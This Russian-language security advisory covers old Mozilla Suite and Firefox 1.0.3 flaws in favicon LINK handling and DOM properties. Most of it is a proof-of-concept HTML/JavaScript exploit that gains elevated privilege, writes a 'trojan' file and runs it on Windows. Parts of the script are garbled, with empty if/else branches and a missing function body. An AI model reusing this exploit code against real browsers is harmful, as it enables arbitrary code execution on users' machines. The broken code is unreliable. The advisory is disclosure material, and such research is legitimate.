Программа: Mozilla версии до 1.7.7, Mozilla Firefox версии 1.0.3

Опасность: Высокая

Описание:
Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе с привилегиями текущего пользователя.

1. Уязвимость существует из-за некорректной обработки тегов ‘link’ для иконок. Удаленный пользователь может с помощью специально сформированного HTML сценария выполнить произвольный код на целевой системе.

2. Уязвимость существует в реализации DOM свойства в Mozilla. Удаленный пользователь может с помощью специально сформированной страницы переписать свойства DOM нодов в контексте данного окна и выполнить произвольный код с повышенными привилегиями.

Пример/Эксплоит ниже.

URL производителя: www.mozilla.org

Решение: Установите последние исправления от производителя.

H-I.N

 

// Mozilla Suite and Firefox "favicons" LINK Code Execution Exploit
// FrSIRT Comment : If a user clicks on a link, this code will create and
// launch the file c: rojan.bat (on Windows).
// On Linux and Mac OS X this code will create the file ~/trojan or /trojan

<html>
<head>
<link rel="SHORTCUT ICON" href="favicon.ico">
<script language="JavaScript" type="text/javascript">
var pf = navigator.platform.toLowerCase();
if (pf.indexOf("win") != -1) else if (pf.indexOf("mac") != -1) else
function runDemo()
</script>
</head>
<body>

<div id="outhtml" style="display:none"></div>

<textarea id="clearhtml" style="display:none">
<link rel="SHORTCUT ICON" href="favicon.ico">
</textarea>

<textarea id="linkhtml_win" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow
('javascript:netscape.security.PrivilegeManager.enablePrivilege
('UniversalXPConnect');file=Components.classes['@mozilla.org/file/local;1']
.createInstance(Components.interfaces.nsILocalFile);
file.initWithPath('c:trojan.bat');file.createUnique(Components
.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components
.classes['@mozilla.org/network/file-output-stream;1']
.createInstance(Components.interfaces.nsIFileOutputStream);outputStream
.init(file,0x04|0x08|0x20,420,0);output='@ECHO
OFFn:BEGINnCLSnDIRnPAUSEn:END';outputStream.write(output,
output.length);outputStream.close();file.launch();','','')">
</textarea>

<textarea id="linkhtml_mac" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:
netscape.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');
file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components
.interfaces.nsILocalFile);file.initWithPath('/trojan');file.createUnique(Components
.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes
['@mozilla.org/network/file-output-stream;1'].createInstance(Components.interfaces
.nsIFileOutputStream);outputStream.init(file,0x04|0x08|0x20,420,0);
output='trojan!';outputStream.write(output,output.length);outputStream
.close();','','')">
</textarea>

<textarea id="linkhtml_linux" style="display:none">
<link rel="SHORTCUT ICON" href="javascript:delayedOpenWindow('javascript:netscape
.security.PrivilegeManager.enablePrivilege('UniversalXPConnect');file=Components
.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces
.nsILocalFile);file.initWithPath('~/trojan');file.createUnique(Components
.interfaces.nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components
.classes['@mozilla.org/network/file-output-stream;1'].createInstance(Components
.interfaces.nsIFileOutputStream);outputStream
.init(file,0x04|0x08|0x20,420,0);output='trojan!';outputStream.
write(output,output.length);outputStream.close();','','')">
</textarea><br>
<a href="#" onclick="runDemo();runDemo();">Click HERE</a>
</div>
</body>
</html>
</pre>

 

Оставит комментарий